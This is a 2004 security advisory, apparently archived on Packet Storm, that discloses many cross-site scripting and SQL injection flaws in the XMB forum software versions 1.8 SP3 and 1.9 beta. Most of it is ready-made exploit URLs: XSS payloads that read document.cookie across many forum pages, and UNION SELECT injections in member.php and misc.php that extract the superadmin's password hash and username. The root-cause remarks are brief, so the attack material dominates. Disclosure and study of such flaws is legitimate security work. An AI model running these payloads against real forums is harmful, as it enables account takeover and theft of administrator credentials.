exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

waraxe-2004-SA012.txt

waraxe-2004-SA012.txt
Posted Mar 27, 2004
Authored by Janek Vind aka waraxe

Multiple SQL injection and cross site scripting vulnerabilities lie in XMB 1.8 Partagium SP3 and 1.9 Nexus Beta. Full exploitation syntax given.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | bd4cabcfa43f68af65bfece48818f4435386a8180e4f61c0fdeb6b20508d212d

waraxe-2004-SA012.txt

Change Mirror Download




{================================================================================}
{ [waraxe-2004-SA#012] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in XMB 1.8 Partagium SP3 and 1.9 Nexus Beta ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Extreme Messageboard aka XMB is very popular and feature rich forum,
based on php and mysql. More information can be found on sites
https://www.aventure-media.co.uk and https://www.xmbforum.com


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ok, we have lot's of the security flaws to disclosure, so let's begin...


1. php and webserver info disclosure and possible XSS

Beginning with XMB 1.9 beta versions, file named phpinfo.php is shipped with forum
software. Original code:

<?php
/* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
phpinfo();
?>

In this way ANYONE can get lot's of insider information from webserver and php engine
environment - good startup for attacker...
And even "better" - phpinfo.php can be used for exploiting the XSS:

https://localhost/xmb19beta/phpinfo.php?foobar=<script>alert(document.cookie);</script>



2. XSS in xmb.php --> works in 1.8 SP3 and 1.9 beta

Example http request:

https://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>

Remark: Log off before trying this or it will not work!



3. XSS in editprofile.php --> only in 1.9 beta

Example request:

https://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>


4. XSS in u2u.php --> works in 1.8 SP3 and 1.9 beta

Example request:

https://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>


5. XSS in stats.php --> works in 1.8 SP3 and 1.9 beta

Reason --> uninitialized variables $viewmost,$replymost,$latest

https://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>


6. XSS in post.php

Reason --> uninitialized variables $message,$icons --> works in 1.8 SP3 and 1.9 beta

https://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/post.php?action=newthread&fid=1&icons=<body%20onload=alert(document.cookie);>


7. XSS in forumdisplay.php --> works in 1.8 SP3 and 1.9 beta

Reason --> uninitialized variables $threadlist,$pagelinks,$forumlist,$navigation,$forumdisplay

https://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>
https://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>


8. Sql injection and XSS in forumdisplay.php

https://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>

Remark: will work only, when no user logged in, because logging in will override the $tpp value.


*************** [really scary sql injection bugs] ***************

9. sql injection and XSS in member.php --> only in 1.9 beta version


Let's look at original code, line 461:

switch($self['status']){
case 'member';
$restrict .= " f.private !='3' AND";

case 'Moderator';

case 'Super Moderator';
$restrict .= " f.private != '2' AND";

case 'Administrator';
$restrict .= " f.userlist = '' AND f.password = '' AND";

case 'Super Administrator';
break;

default:
$restrict .= " f.private !='3' AND f.private != '2' AND f.userlist = '' AND f.password = '' AND";
break;
}
Hmm, $restrict is not initialized anywhere! So we can delivere here all what we want:
https://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
You have an error in your SQL syntax.

XSS:

https://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=<body%20onload=alert(document.cookie);>

And now the funniest part - how to get superadmin's password's md5 hash from database:

https://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20password,null,99%20FROM%20xmb_members%20WHERE%20uid=1%20LIMIT%201%20/*

Or u want superadmin's username? Here it is:

https://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20username,null,99%20FROM%20xmb_members%20WHERE%20uid=1%20LIMIT%201%20/*


10. sql injection and XSS in misc.php --> only in 1.9 beta version


https://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>

https://localhost/xmb19beta/misc.php?action=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20xmb_members%20WHERE%20uid=1%20LIMIT%201%20/*


11. sql injection and XSS in today.php --> only in 1.9 beta version

https://localhost/xmb19beta/today.php?restrict=<body%20onload=alert(document.cookie);>




*************** [/really scary sql injection bugs] ***************


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close